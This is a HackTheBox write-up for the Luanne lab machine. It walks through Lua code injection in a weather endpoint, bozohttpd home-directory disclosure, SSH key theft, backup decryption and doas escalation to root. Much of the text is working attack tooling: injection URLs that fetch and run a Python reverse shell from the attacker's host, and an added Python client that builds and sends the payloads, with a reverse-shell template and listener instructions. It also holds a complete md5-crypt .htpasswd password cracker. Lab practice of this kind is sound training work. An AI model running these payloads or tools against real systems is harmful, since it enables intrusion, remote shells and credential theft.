Luanne Box Writeup & Walkthrough – [HTB] – HackTheBox

Introduction

Luanne is a machine on HackTheBox.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.

This article will show how to hack the Luanne box and obtain user.txt and root.txt.

Enumeration

First, I ran an Nmap scan to see which ports are open. The open ports are 22, 80 and 9001.

Then navigate to the following URL. Observe that it discloses an endpoint.

http://10.129.121.38/robots.txt

Use Gobuster to enumerate under that endpoint; I eventually identified a valid URL:

http://10.129.121.38/weather/forecast?city=list

Hack the Luanne Box

Get User.txt

The city parameter is vulnerable to Lua code injection, which gives OS command execution: the value is embedded inside a single-quoted Lua string, so a') closes the string and the surrounding call, os.execute('...') runs an OS command, and -- comments out the rest of the original Lua line. I can simply execute OS commands by navigating to the following URL (replace OS_Command with the command to run):

http://10.129.121.38/weather/forecast?city=a') os.execute('OS_Command')--

For example:

http://10.129.121.38/weather/forecast?city=a') os.execute('id')--

Because the target is not a standard Linux system (the /usr/pkg paths are pkgsrc, i.e. NetBSD), only a limited set of commands is available and python is not on the default PATH. I located the Python 3.7 binary with find:

http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27find+/+-name+"*python3.7*"%27)--

Then I created a Python reverse shell (1.py) and hosted it with a local HTTP server.

Download the reverse shell into the /tmp folder by navigating to the following URL (10.10.17.26 is my attacking machine):

http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27curl+http://10.10.17.26/1.py+-o+/tmp/1.py%27)--

Finally, with a listener waiting on my machine, I obtained a reverse shell by navigating to the following URL:

http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27/usr/pkg/bin/python3.7+/tmp/1.py%27)--
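As an added example (not code from the original writeup), here is a small Python client that packages the injection steps above: it escapes the command for a single-quoted Lua string, builds the city payload, percent-encodes it the way the URLs above are encoded, and produces the two staging commands used to fetch and run the reverse shell. The target and listener addresses are the ones in this writeup; the content of 1.py is an assumption, since the writeup does not reproduce it.

```python
"""Lua injection helper for the Luanne 'city' parameter.

Added example, not from the original writeup. TARGET and LHOST are the
addresses used in the writeup; the reverse-shell script is an assumed
stand-in for the author's 1.py, which the writeup does not show.
"""
import urllib.parse
import urllib.request

TARGET = "http://10.129.121.38"    # vulnerable host (from the writeup)
ENDPOINT = "/weather/forecast"      # vulnerable endpoint (from the writeup)
LHOST = "10.10.17.26"               # attacker machine (from the writeup)
PYTHON = "/usr/pkg/bin/python3.7"   # interpreter path located with find (from the writeup)


def lua_quote(text: str) -> str:
    """Escape text for use inside a single-quoted Lua string literal.

    A Lua single-quoted literal ends at the first unescaped quote, so a
    command containing ' would break out of os.execute('...') and turn
    into a Lua syntax error instead of a running command.
    """
    return text.replace("\\", "\\\\").replace("'", "\\'")


def build_injection(command: str) -> str:
    """Return the raw value for the city parameter.

    The input lands inside ('...'), so a') closes the string and the call,
    os.execute(...) runs the OS command, and -- comments out whatever Lua
    followed the injection point on that line.
    """
    return f"a') os.execute('{lua_quote(command)}')--"


def build_url(command: str) -> str:
    """Full URL with the payload percent-encoded, as in the writeup's requests."""
    return f"{TARGET}{ENDPOINT}?" + urllib.parse.urlencode({"city": build_injection(command)})


def run(command: str, timeout: float = 15) -> str:
    """Send the payload and return the response body (requires network access)."""
    with urllib.request.urlopen(build_url(command), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def reverse_shell_script(lhost: str, lport: int) -> str:
    """Assumed content of 1.py: a plain socket/dup2 reverse shell."""
    return (
        "import socket, os, pty\n"
        "s = socket.socket()\n"
        f"s.connect(({lhost!r}, {lport}))\n"
        "for fd in (0, 1, 2):\n"
        "    os.dup2(s.fileno(), fd)\n"
        "pty.spawn('/bin/sh')\n"
    )


def staging_commands(lhost: str) -> list:
    """The two OS commands the writeup runs: fetch 1.py into /tmp, then execute it."""
    return [
        f"curl http://{lhost}/1.py -o /tmp/1.py",
        f"{PYTHON} /tmp/1.py",
    ]


if __name__ == "__main__":
    # Print the URLs instead of sending them, so this is safe to run offline.
    print(build_url("id"))
    for cmd in staging_commands(LHOST):
        print(build_url(cmd))
```

To use it live, write reverse_shell_script(LHOST, 4444) to 1.py, serve it with python3 -m http.server 80, start a listener on port 4444 (for example nc -lvnp 4444), and call run() on each of the staging commands in order.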

Run the following command to list listening sockets. Observe that port 3001 is open; it was not exposed externally, which is why it did not appear in the Nmap scan.

netstat -an

There is also a .htpasswd file on the web server.

After cracking its hash, I obtained the following credentials:

webapi_user
iamthebest

Run the following command to request the site on port 3001 with those credentials:

curl -v --user webapi_user:iamthebest http://127.0.0.1:3001/

Observe from the Server header that it is running bozohttpd, as shown in the screenshot below:

According to this article, this version is affected by several vulnerabilities (CVE-2010-2320, CVE-2010-2195). An attacker can reach a user's home directory by prefixing the username with a "~".

Try to access r.michaels' home directory with the following command:

curl -v --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/

Observe that the access succeeds, as shown in the screenshot below:

Download the id_rsa file, restrict its permissions (chmod 600), and log in as r.michaels over SSH.

I then obtained the user.txt file.

Get Root.txt

After enumerating the home directory, I found an encrypted backup: /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc

I tried openssl, but it did not work. The file is PGP-encrypted, and netpgp, run as r.michaels on the box so that it uses his keyring, decrypts it with the following command:

netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/1.tar.gz

Observe that it decrypts successfully, as shown in the screenshot below:

Then I extracted the archive and identified another .htpasswd file inside it.

After cracking its hash, I obtained another credential:

webapi_user
littlebear
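Both .htpasswd files on this box are cracked the same way: recover the user and hash from the line, recognise the format, and try candidates from a wordlist until one hashes to the same value. As an added example (not code from the original writeup), here is a small Python dictionary cracker for md5-crypt entries, the $1$ and Apache $apr1$ hashes that htpasswd commonly produces. The writeup does not reproduce the hashes from the box, so the two entries below are constructed with the same algorithm (salts chosen arbitrarily) around the passwords the writeup recovered, and WORDLIST is a tiny stand-in for a real list such as rockyou.txt.

```python
"""Dictionary attack on md5-crypt ($1$ / $apr1$) entries from a .htpasswd file.

Added example, not from the original writeup. The hashes from the box are
not on the page, so the entries below are constructed here with the same
algorithm; WORDLIST is a tiny stand-in for a real wordlist.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """crypt(3)-style base64: 6 bits per character, least significant first."""
    chars = []
    for _ in range(count):
        chars.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(chars)


def md5_crypt(password: str, salt: str, magic: str = "$1$") -> str:
    """Poul-Henning Kamp's md5-crypt; magic "$apr1$" gives Apache's htpasswd variant."""
    pw = password.encode()
    sl = salt.encode()[:8]          # the salt is at most 8 characters
    ctx = hashlib.md5(pw + magic.encode() + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    n = len(pw)
    while n > 0:                    # mix in len(pw) bytes of the alternate digest
        ctx.update(alt[: min(16, n)])
        n -= 16
    n = len(pw)
    while n:                        # one byte per bit of len(pw)
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):           # fixed 1000 stretching rounds
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sl)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final
    encoded = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return f"{magic}{sl.decode()}${encoded}"


def parse_hash(entry_hash: str):
    """Split "$1$salt$digest" into (magic, salt, digest); reject other formats."""
    parts = entry_hash.split("$")
    if len(parts) != 4 or parts[1] not in ("1", "apr1"):
        raise ValueError(f"unsupported hash format: {entry_hash}")
    return f"${parts[1]}$", parts[2], parts[3]


def crack_htpasswd_line(line: str, wordlist):
    """Return (user, password) for the first matching wordlist entry, or (user, None)."""
    user, entry_hash = line.strip().split(":", 1)
    magic, salt, _ = parse_hash(entry_hash)
    for candidate in wordlist:
        if md5_crypt(candidate, salt, magic) == entry_hash:
            return user, candidate
    return user, None


# Constructed stand-ins for the two .htpasswd files found on the box.
HTPASSWD_WEB = "webapi_user:" + md5_crypt("iamthebest", "vVL1.h2n", "$1$")
HTPASSWD_BACKUP = "webapi_user:" + md5_crypt("littlebear", "Ka.5iXC7", "$apr1$")
WORDLIST = ["password", "123456", "letmein", "iamthebest", "littlebear"]

if __name__ == "__main__":
    for line in (HTPASSWD_WEB, HTPASSWD_BACKUP):
        print(crack_htpasswd_line(line, WORDLIST))
```

In practice you would hand the file to john (which autodetects these formats) or hashcat (-m 500 for $1$, -m 1600 for $apr1$); the point of the block is to show what those tools are doing, including why the 1000 MD5 rounds make each guess comparatively slow.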

Check the doas configuration; it shows that the current user is allowed to run commands as root:

cat /usr/pkg/etc/doas.conf

doas prompts for the invoking user's password, and the password recovered from the backup is reused as r.michaels' login password. Execute the following command and enter it to switch to the root user:

doas -u root /bin/sh

More HackTheBox writeups are available.